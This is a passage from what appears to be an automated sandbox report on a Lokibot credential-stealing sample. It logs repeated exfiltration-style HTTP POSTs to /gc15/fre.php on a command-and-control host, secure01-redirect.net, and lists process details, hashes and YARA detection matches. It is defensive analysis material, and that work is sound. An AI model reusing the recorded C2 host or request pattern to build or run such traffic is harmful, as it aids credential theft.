              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID: 4   Source IP: 192.168.2.6   Source Port: 49774   Destination IP: 185.185.69.76   Destination Port: 80   Process: C:\Users\user\Desktop\kVijllv0Yl.exe
              Timestamp: Jan 28, 2022 23:37:20.261991978 CET   kBytes transferred: 1345   Direction: OUT
              Data: POST /gc15/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: secure01-redirect.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 7A2E941E
              Content-Length: 169
              Connection: close
              Timestamp: Jan 28, 2022 23:37:21.668706894 CET   kBytes transferred: 1346   Direction: IN
              Data: HTTP/1.0 404 Not Found
              Date: Fri, 28 Jan 2022 22:39:02 GMT
              Server: Apache/2.4.6 (CentOS) PHP/5.4.16
              X-Powered-By: PHP/5.4.16
              Status: 404 Not Found
              Content-Length: 23
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID: 5   Source IP: 192.168.2.6   Source Port: 49775   Destination IP: 185.185.69.76   Destination Port: 80   Process: C:\Users\user\Desktop\kVijllv0Yl.exe
              Timestamp: Jan 28, 2022 23:37:22.809911013 CET   kBytes transferred: 1346   Direction: OUT
              Data: POST /gc15/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: secure01-redirect.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 7A2E941E
              Content-Length: 169
              Connection: close
              Timestamp: Jan 28, 2022 23:37:24.212196112 CET   kBytes transferred: 1347   Direction: IN
              Data: HTTP/1.0 404 Not Found
              Date: Fri, 28 Jan 2022 22:39:04 GMT
              Server: Apache/2.4.6 (CentOS) PHP/5.4.16
              X-Powered-By: PHP/5.4.16
              Status: 404 Not Found
              Content-Length: 23
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID: 6   Source IP: 192.168.2.6   Source Port: 49776   Destination IP: 185.185.69.76   Destination Port: 80   Process: C:\Users\user\Desktop\kVijllv0Yl.exe
              Timestamp: Jan 28, 2022 23:37:25.398463011 CET   kBytes transferred: 1348   Direction: OUT
              Data: POST /gc15/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: secure01-redirect.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 7A2E941E
              Content-Length: 169
              Connection: close
              Timestamp: Jan 28, 2022 23:37:26.758080006 CET   kBytes transferred: 1348   Direction: IN
              Data: HTTP/1.0 404 Not Found
              Date: Fri, 28 Jan 2022 22:39:07 GMT
              Server: Apache/2.4.6 (CentOS) PHP/5.4.16
              X-Powered-By: PHP/5.4.16
              Status: 404 Not Found
              Content-Length: 23
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID: 7   Source IP: 192.168.2.6   Source Port: 49779   Destination IP: 185.185.69.76   Destination Port: 80   Process: C:\Users\user\Desktop\kVijllv0Yl.exe
              Timestamp: Jan 28, 2022 23:37:29.263305902 CET   kBytes transferred: 1372   Direction: OUT
              Data: POST /gc15/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: secure01-redirect.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 7A2E941E
              Content-Length: 169
              Connection: close
              Timestamp: Jan 28, 2022 23:37:30.738581896 CET   kBytes transferred: 1373   Direction: IN
              Data: HTTP/1.0 404 Not Found
              Date: Fri, 28 Jan 2022 22:39:11 GMT
              Server: Apache/2.4.6 (CentOS) PHP/5.4.16
              X-Powered-By: PHP/5.4.16
              Status: 404 Not Found
              Content-Length: 23
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID: 8   Source IP: 192.168.2.6   Source Port: 49780   Destination IP: 185.185.69.76   Destination Port: 80   Process: C:\Users\user\Desktop\kVijllv0Yl.exe
              Timestamp: Jan 28, 2022 23:37:33.962521076 CET   kBytes transferred: 1373   Direction: OUT
              Data: POST /gc15/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: secure01-redirect.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 7A2E941E
              Content-Length: 169
              Connection: close
              Timestamp: Jan 28, 2022 23:37:35.373624086 CET   kBytes transferred: 1381   Direction: IN
              Data: HTTP/1.0 404 Not Found
              Date: Fri, 28 Jan 2022 22:39:15 GMT
              Server: Apache/2.4.6 (CentOS) PHP/5.4.16
              X-Powered-By: PHP/5.4.16
              Status: 404 Not Found
              Content-Length: 23
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID: 9   Source IP: 192.168.2.6   Source Port: 49782   Destination IP: 185.185.69.76   Destination Port: 80   Process: C:\Users\user\Desktop\kVijllv0Yl.exe
              Timestamp: Jan 28, 2022 23:37:36.594727993 CET   kBytes transferred: 1382   Direction: OUT
              Data: POST /gc15/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: secure01-redirect.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 7A2E941E
              Content-Length: 169
              Connection: close
              Timestamp: Jan 28, 2022 23:37:37.913034916 CET   kBytes transferred: 1382   Direction: IN
              Data: HTTP/1.0 404 Not Found
              Date: Fri, 28 Jan 2022 22:39:18 GMT
              Server: Apache/2.4.6 (CentOS) PHP/5.4.16
              X-Powered-By: PHP/5.4.16
              Status: 404 Not Found
              Content-Length: 23
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.



              Target ID:0
              Start time:23:36:56
              Start date:28/01/2022
              Path:C:\Users\user\Desktop\kVijllv0Yl.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\Desktop\kVijllv0Yl.exe"
              Imagebase:0x400000
              File size:247353 bytes
              MD5 hash:6997DE404FB7E798AECC2C8A14FD2F12
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000000.00000002.361757781.000000001ADE0000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.361757781.000000001ADE0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.361757781.000000001ADE0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.361757781.000000001ADE0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifacts observed in infostealers, Source: 00000000.00000002.361757781.000000001ADE0000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
              • Rule: Loki_1, Description: Loki Payload, Source: 00000000.00000002.361757781.000000001ADE0000.00000004.00000800.00020000.00000000.sdmp, Author: kevoreilly
              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.361757781.000000001ADE0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
              Reputation:low

              Target ID:1
              Start time:23:36:58
              Start date:28/01/2022
              Path:C:\Users\user\Desktop\kVijllv0Yl.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\Desktop\kVijllv0Yl.exe"
              Imagebase:0x400000
              File size:247353 bytes
              MD5 hash:6997DE404FB7E798AECC2C8A14FD2F12
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000000.350551294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000000.350551294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000001.00000000.350551294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
              • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifacts observed in infostealers, Source: 00000001.00000000.350551294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
              • Rule: Loki_1, Description: Loki Payload, Source: 00000001.00000000.350551294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000001.00000000.350551294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000000.346477507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000000.346477507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000001.00000000.346477507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
              • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifacts observed in infostealers, Source: 00000001.00000000.346477507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
              • Rule: Loki_1, Description: Loki Payload, Source: 00000001.00000000.346477507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000001.00000000.346477507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000000.347539730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000000.347539730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000001.00000000.347539730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
              • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifacts observed in infostealers, Source: 00000001.00000000.347539730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
              • Rule: Loki_1, Description: Loki Payload, Source: 00000001.00000000.347539730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000001.00000000.347539730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000000.349125284.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000000.349125284.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000001.00000000.349125284.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
              • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifacts observed in infostealers, Source: 00000001.00000000.349125284.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
              • Rule: Loki_1, Description: Loki Payload, Source: 00000001.00000000.349125284.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000001.00000000.349125284.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
              • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifacts observed in infostealers, Source: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
              • Rule: Loki_1, Description: Loki Payload, Source: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
              Reputation:low

              No disassembly